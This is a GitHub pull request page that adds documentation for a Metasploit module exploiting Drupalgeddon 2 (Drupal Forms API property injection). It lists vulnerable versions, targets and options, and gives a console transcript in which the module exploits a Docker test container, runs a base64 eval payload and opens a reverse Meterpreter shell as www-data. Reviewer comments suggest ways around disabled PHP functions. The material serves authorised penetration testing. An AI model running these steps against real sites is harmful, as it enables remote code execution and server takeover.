Add Drupal Drupalgeddon 2 #9876
Changes from 15 commits
@@ -0,0 +1,101 @@ | ||
## Intro | ||
|
||
> This module exploits a Drupal property injection in the Forms API. | ||
> Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are | ||
> vulnerable. | ||
|
||
## Setup | ||
|
||
Use the provided Docker images here: <https://hub.docker.com/_/drupal/>. | ||
|
||
Tested on the 7.57 and 8.4.5 tags (versions). | ||
|
||
## Targets | ||
|
||
``` | ||
Id Name | ||
-- ---- | ||
0 Automatic (PHP In-Memory) | ||
1 Automatic (PHP Dropper) | ||
2 Automatic (Unix In-Memory) | ||
3 Automatic (Linux Dropper) | ||
4 Drupal 7.x (PHP In-Memory) | ||
5 Drupal 7.x (PHP Dropper) | ||
6 Drupal 7.x (Unix In-Memory) | ||
7 Drupal 7.x (Linux Dropper) | ||
8 Drupal 8.x (PHP In-Memory) | ||
9 Drupal 8.x (PHP Dropper) | ||
10 Drupal 8.x (Unix In-Memory) | ||
11 Drupal 8.x (Linux Dropper) | ||
``` | ||
|
||
Automatic targeting means the Drupal version will be detected first. | ||
Targets with a specific version will do as they're told (regardless of | ||
what the server is running). | ||
|
||
Dropper targets write to disk. In-memory targets don't. Be mindful of | ||
showing up in someone's process list, though. A dropper might be more | ||
viable in that regard. | ||
|
||
## Options | ||
|
||
**TARGETURI** | ||
|
||
Set this to the remote path of the vulnerable Drupal install. Defaults | ||
to `/` for the web root. | ||
|
||
**PHP_FUNC** | ||
|
||
Set this to the PHP function you'd like to execute. Defaults to | ||
`passthru`. | ||
|
||
**DUMP_OUTPUT** | ||
|
||
Enable this if you'd like to see HTTP responses, including command | ||
output. Defaults to `false` unless `cmd/unix/generic` is your payload. | ||
|
||
**VERBOSE** | ||
|
||
Enable this to show what function and command were executed. Defaults to | ||
`false` due to the sometimes excessive output. | ||
|
||
**ForceExploit** | ||
|
||
Enable this to force exploitation regardless of the check result. | ||
Defaults to `false`, meaning the check result is respected. | ||
|
||
**WritableDir** | ||
|
||
Set this to a writable directory without `noexec` for binary payloads. | ||
Defaults to the current working directory (usually the webapp root). | ||
|
||
## Usage | ||
|
||
``` | ||
Can you add an h3 here with the exact Drupal version that's being tested? Most likely

Sure thing!

I dropped the header, since it stuck out too proudly. I've written in the tested version instead. Thoughts?
||
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2 | ||
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3 | ||
rhost => 172.17.0.3 | ||
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set verbose true | ||
verbose => true | ||
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check | ||
|
||
[*] Drupal 7.x targeted at http://172.17.0.3/ | ||
[*] Executing with printf(): mGE9am2CAHbvmGg | ||
[+] 172.17.0.3:80 The target is vulnerable. | ||
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run | ||
|
||
[*] Started reverse TCP handler on 172.17.0.1:4444 | ||
[*] Drupal 7.x targeted at http://172.17.0.3/ | ||
[*] Executing with printf(): HmsPV8tYlEbF | ||
[*] Executing with assert(): eval(base64_decode(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.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)); | ||
[*] Sending stage (37775 bytes) to 172.17.0.3 | ||
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:43864) at 2018-04-24 03:55:25 -0500 | ||
|
||
meterpreter > getuid | ||
Server username: www-data (33) | ||
meterpreter > sysinfo | ||
Computer : b3a405d5568a | ||
OS : [redacted] | ||
Meterpreter : php/linux | ||
meterpreter > | ||
``` |
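Review bot: the Usage section shows only a Drupal 7.x run, while the Setup section says the module was tested on both the 7.57 and 8.4.5 tags; add a second transcript (at least the `check` output and the target line) against the 8.4.5 image so readers can see the 8.x path and how automatic targeting reports it. Two smaller documentation points in the same hunk: the PHP_FUNC entry says the default is `passthru` but not what to set when that function is listed in PHP's `disable_functions` (naming a couple of known-working alternatives such as `system` or `shell_exec` would save a round of guessing), and the Targets paragraph on process lists should say which targets spawn a separate process and which run inside the web server's PHP worker, since as written it is not clear why a dropper would be "more viable in that regard".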
remove

>

That was my smartass quoting the module description. :P